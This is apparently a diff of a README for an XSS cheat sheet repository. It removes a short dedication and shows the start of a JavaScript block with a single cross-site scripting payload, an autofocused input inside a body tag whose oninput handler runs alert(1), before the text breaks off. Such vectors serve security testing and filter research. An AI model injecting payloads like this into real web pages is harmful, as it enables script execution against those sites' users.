fg0x0/XSS-Cheat-Sheets-2020/README.md

 # XSS-Cheat-Sheets-2020
-By the way you may need it. [ Dear fg0d ]
+By the way you may need it.

 ```javascript
 <body oninput=javascript:alert(1)><input autofocus>